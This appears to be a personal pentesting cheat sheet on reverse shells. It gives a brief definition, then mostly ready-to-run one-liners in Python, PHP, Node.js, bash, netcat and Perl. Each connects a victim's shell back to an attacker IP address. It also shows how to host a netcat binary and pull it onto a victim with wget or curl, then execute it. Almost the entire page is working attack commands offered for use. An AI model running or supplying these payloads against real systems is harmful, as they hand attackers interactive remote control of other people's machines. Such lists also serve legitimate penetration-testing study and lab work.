Skip to content

Reverse shell

It is when attacker, using some volnurability, redirects shell input output from victim's machine to attacker's machine.

How we can do reverce shell

  1. Create tcp server on attacker's machine using nc: 
    nc -lvp 80
  2. Create connection to attacker machine:

Python:

Payload1: 

$command = <<<COMMAND
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.136",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
COMMAND;

echo $command;

passthru($command);
Payload2 
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.51",9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Payload3: 
```python
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

PHP:

$command = <<<COMMAND
php -r '\$sock=fsockopen("192.168.49.136",80);exec("/bin/sh -i <&3 >&3 2>&3");'
COMMAND;

echo $command;

passthru($command);
Other examples of php: 
php -r '$sock=fsockopen("10.0.0.1",80);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",80);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",80);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",80);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("10.0.0.1",80);popen("/bin/sh -i <&3 >&3 2>&3", "r");'
php -r "system(\"bash -c 'bash -i >& /dev/tcp/192.168.49.51/9090 0>&1'\");
https://github.com/pentestmonkey/php-reverse-shell

Nodejs

Payload 

echo "require('child_process').exec('nc -nv 192.168.49.51 9090 -e /bin/bash')" > /var/tmp/offsec.js ; node /var/tmp/offsec.js

Examples in bash:

Attacker machine: 

nc -nlvp 9090
Payload: 
bash -c 'bash -i >& /dev/tcp/192.168.45.194/9090 0>&1'

Netcat

Attacker machine: 

nc -nlvp 9090
Payload 
/bin/nc -nv 192.168.45.211 9090 -e /bin/bash

If victim's machine doesn't has Netcat

Attacker's machine: 

sudo cp /bin/nc /var/www/html/
sudo service apache2 restart
Payload: 
wget http://192.168.49.51:80/nc -O /var/tmp/nc ; chmod 755 /var/tmp/nc ; /var/tmp/nc -nv 192.168.49.51 9090 -e /bin/bash
or 
curl --output /var/tmp/nc http://192.168.49.55:80/nc; chmod 755 /var/tmp/nc; /var/tmp/nc -nv 192.168.49.55 9090 -e /bin/bash

PERL

perl -e 'use Socket;$i="192.168.49.51";$p=9090;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

More payloads here 2023042100033232 Reverse Shell#^3c549e

References

  1. web200.Tools.Shell
  2. https://github.com/swisskyrepo/PayloadsAllTheThings ^cd307c
  3. https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md ^3c549e